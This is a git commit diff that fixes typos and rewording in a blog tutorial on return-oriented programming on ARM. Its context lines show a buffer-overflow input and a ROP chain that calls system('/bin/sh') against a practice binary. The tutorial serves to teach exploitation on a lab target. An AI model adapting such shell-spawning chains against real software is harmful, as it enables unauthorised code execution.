Typos and rewording
Anirudh icyph0x@pm.me
Sat, 08 Jun 2019 17:49:44 +0530
2 files changed,
8 insertions(+),
8 deletions(-)
M
build/blog/rop-on-arm/index.html
→
build/blog/rop-on-arm/index.html
@@ -164,7 +164,7 @@ control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset of the second instruction — <code>add r11, sp, #4</code>. -For this, we’ll use Python to print out input string replacing <code>FFFF</code> with +For this, we’ll use Python to print our input string replacing <code>FFFF</code> with the address of <code>winner</code>. Note the endianness.</p> <div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")'</span> <span class="p">|</span> ./rop2@@ -226,18 +226,18 @@ <span class="n">string</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEE"</span>
<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span> <span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span> -<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system_pc</span><span class="p">)</span> +<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span> </code></pre></div> <p>Honestly, not too far off from our pseudo-code :)</p> -<p>Let's see it in action:</p> +<p>Let’s see it in action:</p> <p><img src="/static/img/the_shell.png" alt="the shell!" /></p> <p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates when the pipe closes, since there’s no input coming in from STDIN. -To get around this, we use <code>cat(1)</code> which allows us to relay input via <code>cat</code> +To get around this, we use <code>cat(1)</code> which allows us to relay input through it to the shell. Nifty trick.</p> <h3>Conclusion</h3>
M
pages/blog/rop-on-arm.md
→
pages/blog/rop-on-arm.md
@@ -134,7 +134,7 @@ control program execution flow. Let’s try jumping to the `winner` function.
Disassemble `winner` again using `disas winner` and note down the offset of the second instruction — `add r11, sp, #4`. -For this, we’ll use Python to print out input string replacing `FFFF` with +For this, we’ll use Python to print our input string replacing `FFFF` with the address of `winner`. Note the endianness. ```shell@@ -196,18 +196,18 @@ string = "AAAABBBBCCCCDDDDEEEE"
gadget = struct.pack("I", 0x00010550) system = struct.pack("I", 0x00010538) -print(string + gadget + binsh + system_pc) +print(string + gadget + binsh + system) ``` Honestly, not too far off from our pseudo-code :) -Let's see it in action: +Let’s see it in action: ![the shell!](/static/img/the_shell.png) Notice that it doesn’t work the first time, and this is because `/bin/sh` terminates when the pipe closes, since there’s no input coming in from STDIN. -To get around this, we use `cat(1)` which allows us to relay input via `cat` +To get around this, we use `cat(1)` which allows us to relay input through it to the shell. Nifty trick. ### Conclusion